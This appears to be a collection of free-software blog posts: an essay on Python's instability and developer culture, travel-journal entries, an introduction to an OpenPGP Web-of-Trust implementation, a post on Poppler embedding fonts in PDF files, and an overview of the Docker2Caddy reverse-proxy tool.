And I can certainly say from observation that in various professional cultures, including academia where my own recent observations were made, there is a persistent phenomenon where people demonstrate “best practice” to show that they as a software development practitioner (or, indeed, a practitioner of anything else related to the career in question) are aware of the latest developments, are able to communicate them to their less well-informed colleagues, and are presumably the ones who should be foremost in anyone’s consideration for any future hiring round or promotion. Unfortunately, this enthusiasm is not always tempered by considered reflection, either on the nature of the supposed innovation itself, or on the consequences its proliferation will have.

Perversely, such enthusiasm, provoked by the continual hustle for funding, positions, publications and reputation, risks causing a trail of broken programs, and yet at the same time, much is made of the need for software development to be done “properly” in academia, that people do research that is reproducible and whose computational elements are repeatable. It doesn’t help that those ambitions must also be squared with other apparent needs such as offering tools and services to others. And the need to offer such things in a robust and secure fashion sometimes has to coexist with the need to offer them in a convenient form, where appropriate. Taking all of these things into consideration is quite the headache.

A Positive Legacy

Amusingly, some have come to realise that Python’s best hope for reproducible research is precisely the thing that Python’s core developers have abandoned – Python 2.7 – and precisely because they have abandoned it. In an article about reproducing old, published results, albeit of a rather less than scientific nature, Nicholas Rougier sought to bring an old program back to life, aiming to find a way of obtaining or recovering the program’s sources, constructing an executable form of the program, and deploying and running that program on a suitable system. To run his old program, written for the Apple IIe microcomputer in Applesoft BASIC, required the use of emulators and, for complete authenticity, modern hardware expansions to transfer the software to floppy disks to run on an original Apple IIe machine.

And yet, the ability to revive and deploy a program developed 32 years earlier was possible thanks to the Apple machine’s status as a mature, well-understood platform with an enthusiastic community developing new projects and products. These initiatives were only able to offer such extensive support for a range of different “retrocomputing” activities because the platform has for a long time effectively been “frozen”. Contrasting such a static target with rapidly evolving modern programming languages and environments, Rougier concluded that “an advanced programming language that is guaranteed not to evolve anymore” would actually be a benefit for reproducible science, that few people use many of the new features of Python 3, and that Python 2.7 could equally be such a “highly fertile ground for development” that the proprietary Applesoft BASIC had proven to be for a whole community of developers and users.

Naturally, no language designer ever wants to be told that their work is finished. Lutz asserts that “a bloated system that is in a perpetual state of change will eventually be of more interest to its changers than its prospective users”, which is provocative but also rings true. CPython (the implementation of Python in the C programming language) has always had various technical deficiencies – the lack of proper multithreading, for instance – but its developers who also happen to be the language designers seem to prefer tweaking the language instead. Other languages have gained in popularity at Python’s expense by seeking to address such deficiencies and to meet the frustrated expectations of Python developers. Or as Lutz notes:

While Python developers were busy playing in their sandbox, web browsers mandated JavaScript, Android mandated Java, and iOS became so proprietary and closed that it holds almost no interest to generalist developers.

In parts of academia familiar with Python, languages like Rust and Julia are now name-dropped, although I doubt that many of those doing the name-dropping realise what they are in for if they decide to write everything in Rust. Meanwhile, Python 2 code is still used, against a backdrop of insistent but often ignored requests from systems administrators for people to migrate code to Python 3 so that newer operating system distributions can be deployed. In other sectors, such migration is meant to be factored into the cost of doing business, but in places like academia where software maintenance generally doesn’t get funding, no amount of shaming or passive-aggressive coercion is magically going to get many programs updated at all.

Of course, we could advocate that everybody simply run their old software in virtual machines or containers, just as was possible with that Applesoft BASIC program from over thirty years ago. Indeed, containerisation is the hot thing in places like academia just as it undoubtedly is elsewhere. But unlike the Apple II community who will hopefully stick with what they know, I have my doubts that all those technological lubricants marketed under the buzzword “containers!” will still be delivering the desired performance decades from now. As people jump from yesterday’s hot solution to today’s and on to tomorrow’s (Docker, with or without root, to Singularity/Apptainer, and on to whatever else we have somehow deserved), just the confusion around the tooling will be enough to make the whole exercise something of an ordeal.

A Detour to the Past

Over the last couple of years, I have been increasingly interested in looking back over the course of the last few decades, back to the time when I was first introduced to microcomputers, and even back beyond that to the age of mainframes when IBM reigned supreme and the likes of ICL sought to defend their niche and to remain competitive, or even relevant, as the industry shifted beneath them. Obviously, I was not in a position to fully digest the state of the industry as a schoolchild fascinated with the idea that a computer could seemingly take over a television set and show text and graphics on the screen, and I was certainly not “taking” all the necessary computing publications to build up a sophisticated overview, either.

But these days, many publications from decades past – magazines, newspapers, academic and corporate journals – are available from sites like the Internet Archive, and it becomes possible to sample the sentiments and mood of the times, frustrations about the state of then-current, affordable technology, expectations of products to come, and so on. Those of us who grew up in the microcomputing era saw an obvious progression in computing technologies: faster processors, more memory, better graphics, more and faster storage, more sophisticated user interfaces, increased reliability, better development tools, and so on. Technologies such as Unix were “the future”, labelled as impending to the point of often being ridiculed as too expensive, too demanding or too complicated, perhaps never to see the limelight after all. People were just impatient: we got there in the end.

While all of that was going on, other trends were afoot at the lowest levels of computing. Computer instruction set architectures had become more complicated as the capabilities they offered had expanded. Although such complexity, broadly categorised using labels such as CISC, had been seen as necessary or at least desirable to be able to offer system implementers a set of convenient tools to more readily accomplish their work, the burden of delivering such complexity risked making products unreliable, costly and late. For example, the National Semiconductor 32016 processor, seeking to muscle in on the territory of Digital Equipment Corporation and its VAX line of computers, suffered delays in getting to market and performance deficiencies that impaired its competitiveness.

Although capable and in some respects elegant, it turned out that these kinds of processing architectures were not necessarily delivering what was actually important, either in terms of raw performance for end-users or in terms of convenience for developers. Realisations were had that some of the complexity was superfluous, that programmers did not use certain instructions often or at all, and that a flawed understanding of programmers’ needs had led to the retention of functionality that did not need to be inscribed in silicon with all the associated costs and risks that this would entail. Instead, simpler, more orthogonal architectures could be delivered that offered instructions that programmers or, crucially, their compilers would actually use. The idea of RISC was thereby born.

As the concept of RISC took off, pursued by the likes of IBM, UCB and Sun, Stanford University and MIPS, Acorn (and subsequently ARM), HP, and even Digital, Intel and Motorola, amongst others, the concept of the workstation became more fully realised. It may have been claimed by some commentator or other that “the personal computer killed the workstation” or words to that effect, but in fact, the personal computer effectively became the workstation during the course of the 1990s and early years of the twenty-first century, albeit somewhat delayed by Microsoft’s sluggish delivery of appropriately sophisticated operating systems throughout its largely captive audience.

For a few people in the 1980s, the workstation vision was the dream: the realisation of their expectations for what a computer should do. Although expectations should always be updated to take new circumstances and developments into account, it is increasingly difficult to see the same rate of progress in this century’s decades that we saw in the final decades of the last century, at least in terms of general usability, stability and the emergence of new and useful computational capabilities. Some might well argue that graphics and video processing or networked computing have progressed immeasurably, these certainly having delivered benefits for visualisation, gaming, communications and the provision of online infrastructure, but in other regards, we seem stuck with something very familiar to that of twenty years ago but with increasingly disillusioned developers and disempowered users.

What we might take away from this historical diversion is that sometimes a focus on the essentials, on simplicity, and on the features that genuinely matter make more of a difference than just pressing ahead with increasingly esoteric and baroque functionality that benefits few and yet brings its own set of risks and costs. And we should recognise that progress is largely acknowledged only when it delivers perceptable benefits. In terms of delivering a computer language and environment, this may necessarily entail emphasising the stability and simplicity of the language, focusing instead on remedying the deficiencies of the underlying language technology to give users the kind of progress they might actually welcome.

A Dark Currency

Mark Lutz had intended to stop commentating on newer versions of Python, reflecting on the forces at work that makes Python what it now is:

In the end, the convolution of Python was not a technical story. It was a sociological story, and a human story. If you create a work with qualities positive enough to make it popular, but also encourage it to be changed for a reward paid entirely in the dark currency of ego points, time will inevitably erode the very qualities which made the work popular originally. There’s no known name for this law, but it happens nonetheless, and not just in Python. In fact, it’s the very definition of open source, whose paradigm of reckless change now permeates the computing world.

I also don’t know of a name for such a law of human behaviour, and yet I have surely mentioned such behavioural phenomena previously myself: the need to hustle, demonstrate expertise, audition for some potential job offer, demonstrate generosity through volunteering. In some respects, the cultivation of “open source” as a pragmatic way of writing software collaboratively, marginalising Free Software principles and encouraging some kind of individualistic gift culture coupled to permissive licensing, is responsible for certain traits of what Python has become. But although a work that is intrinsically Free Software in nature may facilitate chaotic, haphazard, antisocial, selfish, and many other negative characteristics in the evolution of that work, it is the social and economic environment around the work that actually promotes those characteristics.

When reflecting on the past, particularly during periods when capabilities were being built up, we can start to appreciate the values that might have been more appreciated at that time than they are now. Python originated at a time when computers in widespread use were becoming capable enough to offer such a higher-level language, one that could offer increased convenience over various systems programming languages whilst building on top of the foundations established by those languages. With considerable effort having been invested in such foundations, a mindset seemed to persist, at least in places, that such foundations might be enduring and be good for a long time.

An interesting example of such attitudes arose at a lower level with the development of the Alpha instruction set architecture. Digital, having responded ineffectively to its competitive threats, embraced the RISC philosophy and eventually delivered a processor range that could be used to support its existing product line-up, emphasising performance and longevity through a “15- to 25-year design horizon” that attempted to foresee the requirements of future systems. Sadly, Digital made some poor strategic decisions, some arguably due to Microsoft’s increasing influence over the company’s strategy, and after a parade of acquisitions, Alpha fell under the control of HP who sacrificed it, along with its own RISC architecture, to commit to Intel’s dead-end Itanium architecture. I suppose this illustrates that the chaos of “open source” is not the only hazard threatening stability and design for longevity.

Such long or distant horizons demand that newer developments remain respectful to the endeavours that have made them possible. Such existing and ongoing endeavours may have their flaws, but recognising and improving those flaws is more constructive and arguably more productive than tearing everything down and demanding that everything be redone to accommodate an apparently new way of thinking. Sadly, we see a lot of the latter these days, but it goes beyond a lack of respect for precedent and achievement, reflecting broader tendencies in our increasingly stressed societies. One such tendency is that of destructive competition, the elimination of competitors, and the pursuit of monopoly. We might be used to seeing such things in the corporate sphere – the likes of Microsoft wanting to be the only ones who provide the software for your computer, no matter where you buy it – but people have a habit of imitating what they see, especially when the economic model for our societies increasingly promotes the hustle for work and the need to carve out a lucrative niche.

So, we now see pervasive attitudes such as the pursuit of the zero-sum game. Where the deficiencies of a technology lead its users to pursue alternatives, defensiveness in the form of utterances such as “no need to invent another language” arises. Never mind that the custodians of the deficient technology – in this case, Python, of course – happily and regularly offer promotional consideration to a company who openly tout their own language for mobile development. Somehow, the primacy of the Python language is a matter for its users to bear, whereas another rule applies amongst its custodians. That is another familiar characteristic of human behaviour, particularly where power and influence accumulates.

And so, we now see hostility towards anything being perceived as competition, even if it is merely an independent endeavour undertaken by someone wishing to satisfy their own needs. We see intolerance for other solutions, but we also see a number of other toxic behaviours on display: alpha-dogging, personality worship and the cultivation of celebrity. We see chest-puffing displays of butchness about Important Matters like “security”. And, of course, the attitude to what went before is the kind of approach that involves boiling the oceans so that it may be populated by precisely the right kind of fish. None of this builds on or complements what is already there, nor does it deliver a better experience for the end-user. No wonder people say that they are jealous of colleagues who are retiring.

All these things make it unappealing to share software or even ideas with others. Fortunately, if one does not care about making a splash, one can just get on with things that are personally interesting and ignore all the “negativity from ignorant, opinionated blowhards”. Although in today’s hustle culture, this means also foregoing the necessary attention that might prompt anyone to discover your efforts and pay you to do such work. On the actual topic that has furnished us with so many links to toxic behaviour, and on the matter of the venue where such behaviour is routine, I doubt that I would want my own language-related efforts announced in such a venue.

Then again, I seem to recall that I stopped participating in that particular venue after one discussion had a participant distorting public health observations by the likes of Hans Rosling to despicably indulge in poverty denial. Once again, broader social, economic and political influences weigh heavily on our industry and communities, with people exporting their own parochial or ignorant views globally, and in the process corrupting and undermining other people’s societies, oblivious to the misery it has already caused in their own. Against this backdrop, simple narcissism is perhaps something of a lesser concern.

At the End of the Tunnel

I suppose I promised some actionable observations at the start of the article, so what might they be?

Respect Users and Investments

First of all, software developers should be respectful towards the users of their software. Such users lend validation to that software, encourage others to use it, and they potentially make it possible for the developers to work on it for a living. Their use involves an investment that, if written off by the developers, is costly for everyone concerned.

And no, the users’ demands for that investment to be protected cannot be disregarded as “entitlement”, even if they paid nothing to acquire the software, at least if the developers are happy to enjoy all the other benefits of the software’s proliferation. As is often said, power and influence bring responsibility. Just as democratically elected politicians have a responsibility towards everyone they represent, regardless of whether those people voted for them or not, software developers have a duty of care towards all of their users, even if it is merely to step out of the way and to let the users take the software in its own direction without seeking to frustrate them as we saw when Python 2 was cast aside.

Respond to User Needs Constructively

Developers should also be responsive to genuine user needs. If you believe all the folklore about the “open source” way, it should have been precisely people’s own genuine needs that persuaded them to initiate their own projects in the first place. It is entirely possible that a project may start with one kind of emphasis and demand one kind of skills only to evolve towards another emphasis or to require other skills. With Python, much of the groundwork was laid in the 1990s, building an interpreter and formulating a capable language. But beyond that initial groundwork, the more pressing challenges lay outside the language design domain and went beyond the implementation of a simple interpreter.

Improved performance and concurrency, both increasingly expected by users, required the application of other skills that might not have been present in the project. And yet, the elaboration of the language continued, with the developers susceptible to persuasion by outsiders engaging in “alpha-dogging” or even insiders with an inferiority complex, being made to feel that the language was not complete or even adequate since it lacked features from the pet languages of those outsiders or of the popular language of the day. Development communities should welcome initiatives to improve their projects in ways that actually benefit the users, and they should resist the urge to muscle in on such initiatives by seeking to demonstrate that they have the necessary solutions when their track record would indicate otherwise. (Or worse still, by reframing user needs in terms of their own narrow agenda as if to say, “Here is what you are really asking for.” Another familiar trait of the “visionary” desktop developer.)

Respect Other Solutions

Developers and commentators more generally should accept and respect the existence of other technologies and solutions. Just because they have their own favourite solution does not de-legitimise something they have just been made aware of. Maybe it is simply not meant for them. After all, not everything that happens in this reality is part of a performance exclusively for any one person’s benefit, despite what some people appear to think. And the existence of other projects doing much the same thing is not necessarily “wasted effort”: another concept introduced from some cult of economics or other.

It is entirely possible to provide similar functionality in different ways, and the underlying implementations may lend those different projects different characteristics – portability, adaptability, and so on – even if the user sees largely the same result on their screen. Maybe we do want to encourage different efforts even for fundamental technologies or infrastructure, not because anyone likes to “waste effort”, but because it gives the systems we build a level of redundancy and resilience. And maybe some people just work better with certain other people. We should let them, as opposed to forcing them to fit in with tiresome, exploitative and time-wasting development cultures, to suffer rudeness and general abuse, simply to go along with an exercise that props up some form of corporate programme of minimal investment in the chosen solution of industry and various pundits.

Develop for the Long Term and for Stability

Developers should make things that are durable so that they may be usable for many years to come. Or they should at least expect that people may want to use them years or even decades from now. Just because something is old does not mean it is bad. Much of what we use today is based on technology that is old, with much of that technology effectively coming of age decades ago. We should be able to enjoy the increased performance of our computers, not have it consumed by inefficient software that drives the hardware and other software into obsolescence. Technological fads come and go (and come back again): people in the 1990s probably thought that virtual reality would be pervasive by now, but experience should permit us to reflect and to recognise that some things were (and maybe always will be) bad ideas and that we shouldn’t throw everything overboard to pander to them, only to regret doing so later.

We live in a world where rapid and uncomfortable change has been normalised, but where consumerism has been promoted as the remedy. Perhaps some old way of doing something mundane doesn’t work any more – buying something, interacting with public agencies, fulfilling obligations, even casting votes in some kinds of elections – perhaps because someone has decided that money can be saved (and, of course, soon wasted elsewhere) if it can be done “digitally” from now on. To keep up, you just need a smartphone, or a newer smartphone, with an “app”, or the new “app”, and a subscription to a service, and another one. And so on. All of that “works” for people as long as they have the necessarily interest, skills, time, and money to spend.

But as the last few years have shown, it doesn’t take much to disrupt these unsatisfactory and fragile arrangements. Nobody advocating fancy “digital” solutions evidently considered that people would not already have everything they need to access their amazing creations. And when, as they say, neither love nor money can get you the gadgets you need, it doesn’t even matter how well-off you are: suddenly you get a downgrade in experience to a level that, as a happy consumer, you probably didn’t even know still existed, even if it is still the reality for whole sections of our societies. We have all seen how narrow the margins are between everything apparently being “just fine” and there being an all-consuming crisis, both on a global level and, for many, on a personal level, too.

Recognise Responsibilities to Others

Change can be a positive thing if it carries everyone along and delivers actual progress. Meanwhile, there are those who embrace disruption as a form of change, claiming it to be a form of progress, too, but that form of change is destructive, harmful and exclusionary. It should not be a surprise that prominent advocates of a certain political movement advocate such disruptive change: for them, it doesn’t matter how many people suffer by the ruinous change they have inflicted on everyone as long as they are the ones to benefit; everyone else can wait fifty years or so to see some kind of consolation for the things taken from them, apparently.

As we deliver technology to others, we should not be the ones deepening any misery already experienced by imposing needless and costly change. We should be letting people catch up with the state of technology and allowing them to be comfortable with it. We should invest in long-term solutions that address people’s needs, and we should refuse to be shamed into playing the games of opportunists and profiteers who ridicule anything old or familiar in favour of what they happen to be promoting today. We should demand that people’s investments in hardware and software be protected, that they are not effectively coerced into constantly buying new things and seeing their their living standards diminished in other ways, with such consumption burdening our planet’s ecosystem and resources.

Just as we all experience that others have power over us, so we might recognise the power we have over other people. And just as we might expect others to consider our interests, so we might consider the interests of those who have to put up with our decisions. Maybe, in the end, all I am doing is asking for people to show some consideration for the experiences of other people, that their lives not be made any harder than they might already be. Is that really too much to ask? Is that so hard to understand?

Saturday, 07 May 2022

Europe Trip Journal – Entry 5: Bonsoir

This morning I extended my stay in La Rochelle for another day. The night was relatively quiet, since in my 6-bed dormitory only one other bed had been booked. So after a good night of sleep I went to get some breakfast and then straight to the reception to book another night.

With that out of the way I thought it was time to get some work done. Yesterday I had seen some very nice places to work on my way back from the beach, so I quickly went to my room to grab my laptop and went out again. I am glad that I brought my 9-cell battery with me, which gives me a decent amount of battery life while on the road (or in a train, although there is a good chance that french trains will come with outlets).

The spot I had in mind was a bank that was half-way covered by a tree, so there was sufficient room to adapt to the burning sun which slowly crept over the sky. The sea was calm and there was a nice breeze, so it actually got a bit chilly in the shades. It was the perfect balance between heating sun and shade I had to strike.

Today my subject of work was to add support for generating third-party signatures in PGPainless. So far the library was pretty “self-centered”, meaning it was possible to create keys and sign messages, but there wasn’t yet an easy API for signing other keys. That should be about to change.

From the Web-of-Trust specification I had borrowed the terminology of “certifications” and “delegations”. Both terms identify signatures made on another key. Certifications however would be made over “bindings”, which is a term for user-id – self-signature tuples, while delegations would be signatures made over keys. The difference is tht a certification is sort of a statement by the issuer, claiming they have checked that a user-id (e.g. the name or an email address of a person) would belong to a certain key, while a delegation is primarily used to specify to what degree the user trusts a key to issue certifications. It is a way to delegate trust, hence the name.

I will go into further detail on this in a future blog post, but for today it is enough to know that there are two different mechanisms at play here. So after having broken my Intellij by installing a plugin which would automatically make it switch between light- and dark-mode depending on my OSs settings, and spending nearly an hour to find a way to uninstall the defective plugin without the need to start Intellij, I could finally get to work.

For three hours I sat in the sun, typing away. The result is a first proof-of-concept implementation for issuing third-party signatures. I am quite happy with the outcome, although I identified some places where I was reading the specification wrong previously, so some other places in the code base are now broken 😀 That’s just how it is.

With the first design working, I deemed it good enough for today and packed my things to go back to the hostel, but not without a sun-bath the beach before! Another 2 hours or so later I felt sunburned, but happy. Unfortunately I had gotten some sunscreen into my eye earlier, which caused it to tear constantly, even now it is still watering a bit. Annoying…

Back at the hostel I took a shower and then relaxed a bit in my bed. Then I decided to check out the hostels bar. Its a nice, open space with big windows and a lot of chairs to chill out and socialize on. Unfortunately this evening there aren’t many people here, so I opted for a beer instead. It’s a locally brewed, dark coffee beer! Tasty!

Today I thought a bit about greetings. Its something I don’t really think about too much in my usual life. But when in another country with a different language, I have to concentrate to find the right words to greet people, depending on time of day. It made me think about the act of greeting strangers and how nice that actually is. Not that I feel like a particularly nice person when nodding a quick “Bonjour” to someone, I mean the act of greeting someone is something I haven’t really payed that much attention to before. It was a more like a ritual without meaning. When I say “Bonsoir”, it’s more like if I was saying “Wunderschönen Abend” instead of my usual “N’abend”. It makes me realize that in fact, this is a nice evening worth noting to strangers.

Bonsoir 🙂

Friday, 06 May 2022

Europe Trip Journal – Entry 3&4: Nantes & La Rochelle

This post is a little bit delayed. Yesterday, after having a petit-dej’ with a room mate I took the metro to get to the train station for my next journey. I tried capturing the atmosphere in the metro with a sound recording.

Metro atmosphere

Arriving at the gate, I then took the train from Paris Montparnasse to Nantes further to the west. This was my first ride on the TGV. At first it was a bit uncomfortable, as the train was rushing through tunnels at ~300km/h, which caused pressure differences in the cabin which were quite noticeable in the ears. But soon there were less and less tunnels.

Two hours later the train stopped at Nantes. I had no idea where to go first, so I walked straight into the nearby park, the Jardin des Plantes. What a beautiful place to hang out.

My next objective was to find a place to sleep, so I went to the next auberge de jeunesse (youth hostel), only to find that the place had been transformed into a refugee camp. So I had to find something else.

A 5km walk away from the train station was a hostel which I could book a room in. This has so far been my most expensive stay so far, so I hope from now on I will always find more affordable youth hostels. Arriving at my room I was exhausted and spent the rest of the day in bed. At least this night I could sleep very well 🙂

The next morning I woke up, had breakfast and after a video call I went to the Gare du Nantes train station. On the way I once again meandered through the Jardin des Plantes and admired beautiful plants and ponds.

At the train station, I once again wondered how French trains could all be so punctual. This is not how I know it from Germany, where its much more common that trains are delayed or even cancelled completely.

Then it was time to board the IC train to La Rochelle. During the ride, an elderly french woman sat across from me. She fiddled with an insulating drinking bottle seal, which would not let any coffee out. She got so grumpy and even though I barely understand french, I knew she was cursing. At some point she noticed that I was amused, and that in turn made her sneer.

Arriving at La Rochelle, I went to the youth hostel, but it was still closed. It would open up in 2 hours, so I figured it would be best to go to the beach.

After I got nearly sunburned, it was time to check into the hostel, but right after that, I went out again, bought sunscreen in a local super market and went back to the beach where I stayed until the sun started to go down.

A very stony beach

On the way back I followed a path over a small cliff coast. As I am now starting to get used to, everything was lovely planted and neatly trimmed.

I’m thinking of staying another day here in La Rochelle. But now I will try to get some sleep 🙂

Creating an OpenPGP Web-of-Trust Implementation – A Series

I am excited to announce that PGPainless will receive funding by NGI Assure to develop an implementation of the Web-of-Trust specification proposal!

https://nlnet.nl/assure/

The Web-of-Trust (WoT) serves as an example of a decentralized authentication mechanism for OpenPGP. While there are some existing implementations of the WoT in applications such as GnuPG, their algorithms are often poorly documented. As a result, WoT support in client applications is often missing or inadequate.

This is where the aforementioned specification comes into play. This document strives to provide a well-documented description of how to implement the WoT in an interoperable and comprehensible way. There is already an existing implementation by the Sequoia-PGP project (Neal, the author of the specification is also heavily involved with Sequoia) which can serve as a reference implementation.

Since I imagine implementing the Web-of-Trust isn’t a straight-forward task (even though there is now a specification document), I decided to dedicate a series of blog posts to go along with my efforts. Maybe this helps others implementing it in the future.

What exactly is the Web-of-Trust?

The essential problem with public key infrastructure (PKI) is not to obtain the encryption keys for contacts, but rather verify that the key you have of a contact really is the proper key and not that of an attacker. One straight-forward solution to this is used by every user of the internet every day. If you visit a website on the internet, the web server of the site presents your browser with its TLS certificate. Now the browser has to figure out, if this certificate is trustworthy. It does so by checking if there is a valid trust-path from one of its root certificates to the sites certificate. Your browser comes with a limited set of root-certificates already preinstalled. This set was agreed upon by your browsers/OS vendor at some point. These root certificates are (mostly) managed by corporations who’s business model is to vouch for your servers authenticity. You pay them so that they testify to others that your TLS certificate is legitimate.

In this case, a trust-path is a chain of certifications from the trusted root certificate down to the sites TLS certificate. You can inspect this chain manually, by clicking the lock icon in your browsers task bar (at least on Firefox). Below is a visualization of the TLS certificate chain of this blog’s TLS certificate.

The certificate “ISRG Root X1” belongs to let’s encrypt, a not-for-profit CA that very likely is embedded in your browser already. R3 is an intermediate certificate authority of let’s encrypt. It certified my blogs TLS certificate. Since during the certificate renewal process let’s encrypt made sure that my server controls my domain, it has some degree of confirmation that blog.jabberhead.tk in fact belongs to me. This step can be called manual identity verification. As a result, it can therefore attest the legitimacy of my TLS certificate to others.

One property of this model is that its centralized. Although there is a number of root certificates (hundreds in fact, check your /etc/ssl/certs/ directory!), it is not trivial to set up your own, let alone get browser/OS vendors to include it in their distributions.

Now lets take a look at the Web-of-Trust instead. The idea that describes the difference between the centralized TLS model and the WoT best, is that people trust people instead of corporations. If Alice trusts and vouches for Bob, and Bob trusts and vouches for Charlie, Alice could transitively trust Charlie. These trust paths can get arbitrarily long and the whole network of trust paths is what we call the Web-of-Trust. Instead of relying on a more-or-less trustworthy certificate authority to attest key authenticity, we gather evidence for the trustworthiness of a key in our social circle.

This model can be applied to corporate environments as well by the way. Let’s say FooBank is using the Web-of-Trust for their encrypted email traffic. FooBanks admin would be tasked with keeping a list of the email addresses of all current employees and their encryption keys. They would then certify these keys by signing them with a company key which is kept secure. These certification signatures are valid as long as the employee is working at the bank. Other employees would in return sign the company key and mark it as trustworthy. Now they can build a trust path from their own key to that of each other current employee. In that sense, the CA model can be seen as a special case of the Web-of-Trust.

The main problem now is to find an algorithm for determining whether a valid trust path exists between our trust-root and the certificate of interest. You might wonder “What is the trust-root? I thought the WoT comes without centralized trust in a single entity?”. And you are right. But we all trust ourselves, don’t we? And we trust ourselves to decide whom to trust. So to realize the WoT, we define that each user has their own “trust-root” certificate, which is a single certificate that certifies “trusted introducers”. This is the start of the trust-path. In case of FooBank, Employee Albert might for example have a personal trust-root certificate that certifies FooBanks CA key, as well as that of Alberts wive Berta. Now Albert can securely message any FooBank employee, as well as his wive, since there are trust-paths available from his trust-root to those contacts.

Luckily, the problem of finding an algorithm to determine trust-paths is already solved by the Web-of-Trust specification. All that’s left to do is to understand and implement it. That cannot be that hard, can it?

To be continued…

Friday, 29 April 2022

Poppler finally has support for embedding fonts in PDF files!

 Why would you want to embed fonts in PDF files are you probably asking yourself?

Short answer: It fixes issues when adding text to the PDF files.

Long answer:

Poppler has had the feature of being able to fill in forms, create annotations and more recently add Digital Signatures to existing PDF files.

This works relatively well if you limit yourself to entering 'basic' ASCII characters, but once you go to more 'complex' characters, things don't really work, from the outside it seems like it should be relatively simple to fix, but things related to PDF are never as simple as they may seem.

In PDF each bit of text is associated with a Font object. That Font generally only supports one kind of text encoding and at most 'only' 65535 characters (65535 may seem a lot, but once you start taking into account non latin-based languages, you quickly 'run out' of characters).

What Poppler used to do in the past was just save the text in the PDF file and say "This text is written in Helvetica font", without even really care to specify much what 'Helvetica font' meant,  and then let the PDF viewer (remember when we save the PDF file, it will not only be rendered by Poppler again, but potentially by Adobe Reader, Chrome, Firefox, etc.) try to figure out what to do with that information, which as said usually didn't go very well for the more 'complex' characters.

What we do now is for each character of new text that we add to the file is we make sure to embed a font for it. So if you're writing something like 'holaħŋ↓' we may end up adding a few fonts to the PDF file, and then instead of saying 'This is the text and it's in Helvetica, good luck', we will say something like 'This text is characters 4, 67, 83 and 98 of embedded Font X, characters 4 and 99 of embedded Font X2 and character 16574 of embedded Font X3'. This way when the file is opened by a PDF viewer it is 'very easy' for them to do the right thing and show what we wanted.

Enough of technical talk! Now some screenshots to show how this has been fixed for Text Annotations, Forms and Signatures :)

Writing "hello↓漢you" to a form

Before

imatge 

Now

 imatge 

Signing a PDF file with my name being "Albeŋŧ As漢tals Ciđ"

Before

image 

Now

image 

 

Writing hola↓漢字 in a Text Annotation

Before

 

 Now

Monday, 25 April 2022

Docker2Caddy - An automatic Reverse Proxy for Docker containers

So you have a number of Docker containers running web services which you would like to expose to the outside? Well, you probably will at least have considered a reverse proxy already. Doing this manually for one, two or even five containers may be feasible, but everything above that will be a PITA for sure. At the FSFE we ran into the same issue with our own distributed container infrastructure at and crafted a neat solution that I would like to present to you in the next few minutes.

The result is Docker2Caddy that provides a workflow in which you can spin up new containers anytime (e.g. via a CI) and the reverse proxy will just do the rest for you magically.

The assumptions

Let’s assume you want to go with reverse proxies to make your web services accessible via ports 80 and 443. There are other possibilities, and in more complex environments there may be already integrated solutions, but for this article we’ll wade in a rather simple environment spun up with docker-compose1.

Let’s also assume you care about security and go with a rootless installation of Docker. So the daemon will run as an unprivileged user. That’s possible but much more complex than the default rootful installation2. Because of this, a few other solutions will not work, we’ll check that later.

Finally, each container shall at least have one separate domain assigned to it for which you obviously want to have a valid certificate, e.g. by Let’s Encrypt.

In the examples below, we have two containers running, each running a webserver listening to port 8080. The first container shall be available via first.com, the second via second.net. The latter shall also be available via www.second.net.

The problems

In the described scenario, there are a number of problem for automating the configuration of the reverse proxy in order to direct a domain to the correct container, starting with container discovery to IPv6 routing to handling offline containers.

The reverse proxy has to be able to discover the currently running containers and ideally monitor for changes regularly so that a newly created container with a new domain is reachable within a short time without manual intervention.

Before Docker2Caddy we have used nginx-proxy combined with acme-companion (formerly known as docker-letsencrypt-nginx-proxy-companion). These are Docker containers that query all containers connected to the bridge Docker network. For this to work, the containers have to run with environment variables indicating the desired domains and local ports that shall be proxied.

In a rootless Docker setup this finally reaches its limits although discovery still works. But already before that we did not like the fact that we had to connect containers to the bridge network upon creation and therefore lost a bit more isolation (which is dubious in Docker anyway).

Now, with rootless, IPv6 was the turning point. Even in rootful Docker setups, IPv6 – a 20+ years old, well defined standard protocol – is a pain in the butt. But with rootless, the FSFE System Hackers team did not manage to get IPv6 working in containers to the degree that we needed. While IPv6 traffic reached the nginx-proxy, it was then treated as IPv4 traffic with the internal Docker IP address. That bits you ultimately if you limit requests based on IP addresses, e.g. for signups or payments. All traffic via IPv6 will be treated as the same internal IPv4 address, therefore triggering the limits regularly.

The easiest solution therefore is to use a reverse proxy running on the host system, not as a Docker container with its severe limitations. While the first intuition lead us to nginx, we decided to go with Caddy. The main advantages we saw are that a virtual host in Caddy is very simple to configure and that TLS certificates are generated and maintained automatically without extra dependencies like certbot.

In this setup, containers would need to open their webserver port to the host. This “public” port has to be unique per host, but the internal port can stay the same, e.g. port 1234 could be mapped to port 8080 inside the container. In Caddy you would then configure the domain first.org to forward to localhost:1234. A more or less identical second example container could then expose the port 5678 to the host, again listen on 8080 internally, and Caddy would redirect second.net and www.second.net to localhost:5678.

But how does Caddy know about the currently running containers and the ports via which they want to receive traffic? And how can we handle containers that are unavailable, for instance because they crashed or have been deleted for good? Docker2Caddy to the rescue!

The solution

I already concluded that Caddy is a suitable reverse proxy for the outlined use case. But in order to be care-free, the configuration has to be generated automatically. For this to work, I wrote a rather simple Python application called Docker2Caddy that is kept running in the background via a systemd service and writes proper logs that are also rotated nicely.

This is how it works internally: it queries (in a configurable interval) the Docker daemon for running containers. For each container it looks for specific labels (that are also configurable), by default proxy.host, proxy.host_alias and proxy.port. If one or multiple containers are found – in our case two – one Caddy configuration file per container is created. This is based on a freely configurable Jinja2 template. If the configuration changed, e.g. by a new host, Caddy will be reloaded and will create a TLS certificate if needed.

But what happens if a container is unavailable? In Docker2Caddy you can configure a grace period. Until this is reached, the Caddy configuration for the container in question is not removed but could forward to a local or remote error page. Only afterwards, the configuration is removed, and Caddy reloaded subsequently.

So, what makes Docker2Caddy special? I am biased but see a number of points:

  1. Simplicity: fundamentally it’s a 188 pure lines of code Python script.
  2. Configurability: albeit it’s simplicity, it’s easy to configure for various needs thanks to the templates and the support for rootless Docker setups.
  3. Adaptability: it should be rather simple to make Docker2Caddy also work for Podman, or even use different reverse proxies. Feel free to extend it before I’ll do it myself someday ;)
  4. Performance: while I did not perform before/after benchmarks, Caddy is blazingly fast and will surely perform better on the host than in a limited Docker container.

If you’re facing the same challenges in your setup, please feel free to try it out. Installation is quite simple and there’s even a minimal Ansible playbook. If you have feedback, I appreciate reading it via comments on Mastodon (see below), email, or, if you have an FSFE account, as a new issue or patch at the main repo.


